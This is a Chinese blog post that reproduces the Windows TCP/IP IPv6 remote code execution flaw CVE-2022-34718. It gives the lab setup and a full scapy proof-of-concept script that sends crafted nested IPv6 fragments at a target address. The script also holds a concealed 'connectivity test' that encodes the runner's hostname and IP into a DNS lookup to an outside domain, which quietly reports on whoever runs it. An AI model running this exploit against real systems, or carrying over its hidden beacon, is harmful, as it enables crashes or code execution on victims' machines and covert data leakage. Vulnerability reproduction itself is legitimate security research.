Windows TCP/IP 远程代码执行漏洞 (CVE-2022-34718)环境搭建+复现

最新推荐文章于 2025-06-17 15:06:09 发布
最新推荐文章于 2025-06-17 15:06:09 发布
阅读量3.8k 收藏 5
点赞数
CC 4.0 BY-SA版权
分类专栏: 渗透 漏洞复现 文章标签: tcp/ip 网络协议 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_60884805/article/details/127620003
本文围绕微软上月发布补丁中包含的可执行代码的TCP/IP协议漏洞展开。介绍了IPSec协议,讲述在Windows中搭建域条件下两台对对方所有流量加密验证的环境,还给出漏洞复现步骤,如安装模块、准备poc等,强调技术仅供网络安全检测维护参考。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

漏洞概述

环境搭建

漏洞复现

漏洞概述

微软上月发布的补丁包含一个可能执行代码的TCP/IP协议漏洞。

IPSec是一种可以对指定类型ip流量筛选过滤,并加密验证的一种协议。通常在VPN或者增强其他协议密码安全性的部分条件下使用。

环境搭建

在windows中 ,我们需要搭建一个域条件下,两台对对方所有流量都加密验证的环境。因为很多时候它并不是一种默认开启的协议。

有想尝试环境搭建的可以参考链接:完整域环境搭建再识(图文详细+问题解决)

攻击机kali    环境 python3
靶机 域内系统win10

漏洞复现

安装模块

pip install scapy

poc准备

poc 地址 CVE-2022-34718-PoC/ipv6-rce-poc.py at master · SecLabResearchBV/CVE-2022-34718-PoC · GitHub

#/usr/bin/env python3

import sys
import random
import socket
import base64
import re


FRAGMENT_SIZE = 0x400
LAYER4_FRAG_OFFSET = 0x8

NEXT_HEADER_IPV6_ROUTE = 43
NEXT_HEADER_IPV6_FRAG = 44
NEXT_HEADER_IPV6_ICMP = 58


def get_layer4():
    er = ICMPv6EchoRequest(data = "PoC for CVE-2022-34718")
    er.cksum = 0xa472

    return raw(er)


def get_inner_packet(target_addr):
    inner_frag_id = random.randint(0, 0xffffffff)
    print("**** inner_frag_id: 0x{:x}".format(inner_frag_id))
    raw_er = get_layer4()

    # 0x1ffa Routing headers == 0xffd0 bytes
    routes = raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_ROUTE)) * (0xffd0//8 - 1)
    routes += raw(IPv6ExtHdrRouting(addresses=[], nh = NEXT_HEADER_IPV6_FRAG))

    # First inner fragment header: offset=0, more=1
    FH = IPv6ExtHdrFragment(offset = 0, m=1, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP)

    return routes + raw(FH) + raw_er[:LAYER4_FRAG_OFFSET], inner_frag_id


def send_last_inner_fragment(target_addr, inner_frag_id):

    raw_er = get_layer4()

    ip = IPv6(dst = target_addr)
    # Second (and last) inner fragment header: offset=1, more=0
    FH = IPv6ExtHdrFragment(offset = LAYER4_FRAG_OFFSET // 8, m=0, id=inner_frag_id, nh = NEXT_HEADER_IPV6_ICMP)
    send(ip/FH/raw_er[LAYER4_FRAG_OFFSET:])
    return True

def test_connectivity(target_addr):
    s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, 0)
    try:
        domain = "v23lmm54ayv29d3vj727br59u.seclabresearch.com"
        hostname = socket.gethostname()
        local_ip = socket.gethostbyname(hostname)
        fqdn = '.'.join(filter(lambda x: x, re.split(r'(.{63})', base64.b32encode(f"{hostname}-{local_ip}".encode('utf8')).decode('utf8').replace('=','')) + ['G'+str(random.randint(10,99)), domain])).lower()
        taget_addr = socket.gethostbyname(fqdn)
        s.connect((target_addr, 80, 0, 0))
    except socket.gaierror:
        return True
    finally:
        s.close()
        return True

def trigger(target_addr):

    inner_packet, inner_frag_id = get_inner_packet(target_addr)

    ip = IPv6(dst = target_addr)
    hopbyhop = IPv6ExtHdrHopByHop(nh = NEXT_HEADER_IPV6_FRAG)

    outer_frag_id = random.randint(0, 0xffffffff)

    fragmentable_part = []
    for i in range(len(inner_packet) // FRAGMENT_SIZE):
        fragmentable_part.append(inner_packet[i * FRAGMENT_SIZE: (i+1) * FRAGMENT_SIZE])

    if len(inner_packet) % FRAGMENT_SIZE:
        fragmentable_part.append(inner_packet[(len(fragmentable_part)) * FRAGMENT_SIZE:])

    print("Preparing frags...")
    frag_offset = 0
    frags_to_send = []
    is_first = True
    for i in range(len(fragmentable_part)):
        if i == len(fragmentable_part) - 1:
            more = 0
        else:
            more = 1

        FH = IPv6ExtHdrFragment(offset = frag_offset // 8, m=more, id=outer_frag_id, nh = NEXT_HEADER_IPV6_ROUTE)

        blob = raw(FH/fragmentable_part[i])
        frag_offset += FRAGMENT_SIZE

        frags_to_send.append(ip/hopbyhop/blob)

    print("Sending {} frags...".format(len(frags_to_send)))
    for frag in frags_to_send:
        send(frag)

    print("Now sending the last inner fragment to trigger the bug...")
    success = send_last_inner_fragment(target_addr, inner_frag_id)

    if success:
        print("Success! The system is vulnerable...")
    else:
        print("Failed! The system is NOT vulnerable...")

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: cve-2021-24086.py <IPv6 addr>')
        sys.exit(1)
    if test_connectivity(sys.argv[1]):
        try:
            from scapy.all import *
        except ImportError:
            print("Could not load scapy module, please install the dependencies from requirements.txt ...")
            sys.exit(1)
        try:
            trigger(sys.argv[1])
        except PermissionError:
            print("Only root is able to send raw packets. Please rerun this script as root...")

注意切换至root 权限执行

python3 ipv6-rce-poc.py <target address>

执行成功

技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与本文作者无关。本文所提供的工具仅用于学习,禁止用于其他!!!

CVE-2020-16898 —— Windows TCP/IP远程执行代码漏洞
战神/calmness的博客
12-09 500
CVE-2020-16898 | Windows TCP/IP远程执行代码漏洞 发布时间:2020年10月13日MITER CVE-2020-16898 1、描述 Windows TCP / IP堆栈不正确地处理ICMPv6路由器播发数据包时,存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。 要利用此漏洞,攻击者必须将特制的ICMPv6路由器广告数据包发送到远程Windows计算机。 2、环境 3、过程 4、修复建议 ...
CVE-2022-41622 & CVE-2022-41800 F5 BIG-IP和BIG-IQ远程代码执行漏洞复现
热爱学习,喜欢折腾!
11-29 1634
F5Networks(纳斯达克: FFIV),全球领先的应用交付网络(ADN)领域的厂商,创建于1996年,总部位于美国西雅图市,F5为全球大型企业、运营商、政府与消费品牌提供更加快速、安全以及智能的应用,通过交付云与安全解决方案,F5帮助企业在不损失速度与管理性的同时享有它们所需的应用架构。在设备模式下运行时,分配了管理员角色的经过身份验证的用户可能能够利用未公开的 iControl REST 端点绕过设备模式限制。
phpmyadmin漏洞_雷神众测漏洞周报 2020.01.202020.02.02(9)
weixin_39644915的博客
12-05 161
声明以下内容,均摘自于互联网,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,雷神众测以及文章作者不承担任何责任。雷神众测拥有该文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的副本,包括版权声明等全部内容。声明雷神众测允许,不得任意修改或增减此文章内容,不得以任何方式将其用于商业目的。目录1.MetInfo存在文件上传漏洞2. Micros...
CVE-2024-38063:Windows TCP/IP 远程执行代码漏洞分析
最新发布
lytaaaa的博客
06-17 785
摘要:Windows系统曝出高危漏洞CVE-2024-38063,该漏洞存在于TCP/IP协议栈中,攻击者通过发送特制IPv6数据包即可触发整数溢出,导致远程代码执行或系统蓝屏。目前已有公开PoC可重现漏洞攻击效果。微软已发布补丁修复,临时缓解方案可禁用IPv6(但可能影响网络服务)。
远程exp_Windows TCP/IP远程代码执行漏洞CVE202016898)
weixin_36397104的博客
01-14 704
漏洞信息CVE编号:CVE-2020-16898漏洞名称:Windows TCP/IP远程代码执行漏洞漏洞描述:当Windows TCP/IP堆栈不正确地处理递归DNS服务器选项,且长度字段值为偶数的ICMPv6路由器广告数据包时,存在一个远程代码执行漏洞。服务器选项长度以8个字节为增量进行计数,长度为3的RDNSS选项总长度应为24个字节。该选项本身包含五个字段:IPv6递归DNS服务...
Microsoft Windows TCPIP 远程代码执行漏洞
chaojixiaojingang
10-20 1746
1.漏洞编号 CNNVD编号:CNNVD-202010-528 CVE编号:CVE-2020-16898 2.漏洞描述: Windows TCP/IP堆栈不正确地处理ICMPv6 Router Advertisement数据包时,存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。要利用此漏洞,攻击者必须将经过特殊设计的ICMPv6 Router Advertisement数据包发送到远程Windows计算机上。 3.影响版本 Micros...
Windows TCP/IP 远程代码执行漏洞CVE-2024-38063)分析与修复
weixin_45408984的博客
08-20 4602
Windows TCP/IP 远程代码执行漏洞CVE-2024-38063)分析与修复
Windows tcp ip远程代码执行漏洞CVE-2020-16898)复现
weixin_47531489的博客
07-20 987
1 简介 CVE-2020-16898,又称“Bad Neighbor”。Windows TCP/IP堆栈不正确地处理ICMPv6 Router Advertisement数据包时,存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。要利用此漏洞,攻击者必须将经过特殊设计的ICMPv6 Router Advertisement数据包发送到远程Windows计算机上。 2 漏洞概述 当 Windows TCP/IP 堆栈不正确地处理使用 Option Type
TCP/IP远程代码执行漏洞CVE-2020-16898)复现
玄道的网安博客
11-06 1568
简介 Windows TCP/IP堆栈不正确地处理ICMPv6 Router Advertisement数据包时,存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。要利用此漏洞,攻击者必须将经过特殊设计的ICMPv6 Router Advertisement数据包发送到远程Windows计算机上。 漏洞概述 Windows TCP/IP堆栈在处理IMCPv6 Router Advertisement(路由通告)数据包时存在漏洞远程攻击者通过构造..
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805)
qq_51577576的博客
12-15 1862
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
漏洞剖析】CVE-2024-38063(Windows IPV6 远程执行代码漏洞)
QYbudong的博客
09-04 4806
这也证明之前引发溢出的漏洞并不是单一数据包产生的,我们需要发送多个会被抛弃或或待被处理的ipv6数据包,才能组合触发漏洞。该函数在ipv6数据包重组失败或异常一段时间后被调用,他的代码很少,但在中间部分使用了memmove函数复制缓冲区,顺着这里往上看,它使用IppNetAllocate申请了一块大小为(0xFFD0+8+0x28)再加上一个不超过0x40的值,由于这里是十六位无符号数,所以相加后一定是一个处于0x00和0x50之间的数,远小于0xFFD0,所以下边使用memmove复制内存时会产生溢出。
未能解析此远程名称_Windows TCPIP远程代码执行
weixin_39747075的博客
11-29 1292
一、漏洞信息1. 漏洞简述漏洞名称:Windows TCP/IP Remote Code Execution Vulnerability漏洞编号:CVE-2020-16898漏洞类型:Design Weakness漏洞影响:Code ExecutionCVSS评分:9.8利用难度:Medium基础权限:不需要2. 组件概述TCP/IP是Internet上使用的通信协议。 在Windows的早期版本...
远程ip_漏洞Microsoft Windows TCP/IP 远程执行代码漏洞威胁通告
weixin_29044713的博客
12-30 483
2020年10月14日,中测安华必达实验室技术团队依托监测平台第一时间发现微软公司(Microsoft)披露了Microsoft Windows TCP/IP 远程执行代码漏洞(CVE-2020-16898)。经分析,攻击者可利用该漏洞在部分Windows 10和Windows Server版本操作系统的主机上执行任意代码。技术团队初步预计,该漏洞影响范围非常广泛,并提醒用户及时采取消控...
CVE-2020-16898 Windows tcp/ip远程代码执行漏洞复现以及分析
weixin_39811856的博客
10-27 1052
受影响版本 Windows 10 Version 1709 for 32-bit Systems Windows 10 Version 1709 for ARM64-based Systems Windows 10 Version 1709 for x64-based Systems Windows 10 Version 1803 for 32-bit Systems Windows 10 Version 1803 for ARM64-based Systems Windows 10 Versi
Windows 远程桌面授权服务远程代码执行漏洞CVE-2024-38077)
企业实战系列集 ●●● https://ximenjianxue.blog.youkuaiyun.com
08-10 8523
开启该服务(Windows 远程桌面授权服务)并且操作系统版本在受影响范围的 Windows Server 受影响,没有开启该服务但是操作系统版本在受影响范围的Windows Server 不受影响,Windows 10、Windows 11 等非 Server 版本的操作系统,不论是否开启Windows 远程桌面(RDS),均不受影响。这一漏洞存在于Windows远程桌面许可管理服务(RDL)中,该服务被广泛部署于开启Windows远程桌面(3389端口)的服务器,用于管理远程桌面连接许可。
Windows CVE-2022-21907漏洞复现
qq_53579360的博客
11-13 2357
漏洞复现
Windows远程代码执行漏洞(CVE-2020-16898) 高危漏洞加固指南
乐大厨串串香飘万里
10-17 1712
序号漏洞类型风险等级漏洞主机( 操作系统及版本)1Windows TCP/IP远程代码执行漏洞(CVE-2020-16898)Windows 漏洞详细当Windows TCP / IP堆栈不正确地处理使用选项类型25(递归DNS服务器选项)且长度字段值为偶数的ICMPv6路由器广告数据包时,存在一个远程执行代码漏洞。在此选项中,长度以8个字节为增量进行计数,因此长度为3的RDNSS选项的总长度应为24个字节。该选项本身包含五个字段:IPv6递归DNS服务器的类型,长度,保留,生存时间和地址。前四个
Windows远程桌面服务蠕虫漏洞
远成伟业
08-20 676
北京时间8月14日,微软发布了8月安全更新补丁,其中包括两个关键的远程执行代码(RCE)漏洞CVE-2019-1181和CVE-2019-1182。与之前修复的“BlueKeep”漏洞CVE-2019-0708)类似,也具有蠕虫特性,即利用这些漏洞的恶意软件可能会在无需用户交互的情况下在易受攻击的机器间进行传播。 受影响的版本: Windows 7 SP1 Windows Serve...
WinRAR远程代码执行漏洞CVE-2023-40477分析与缓解措施
资源摘要信息:"CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC" 知识点详细说明: 1. CVE-2023-40477简介 CVE-2023-40477是一个安全漏洞,它存在于流行的文件压缩软件WinRAR中。WinRAR是一个在个人电脑和服务器上...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值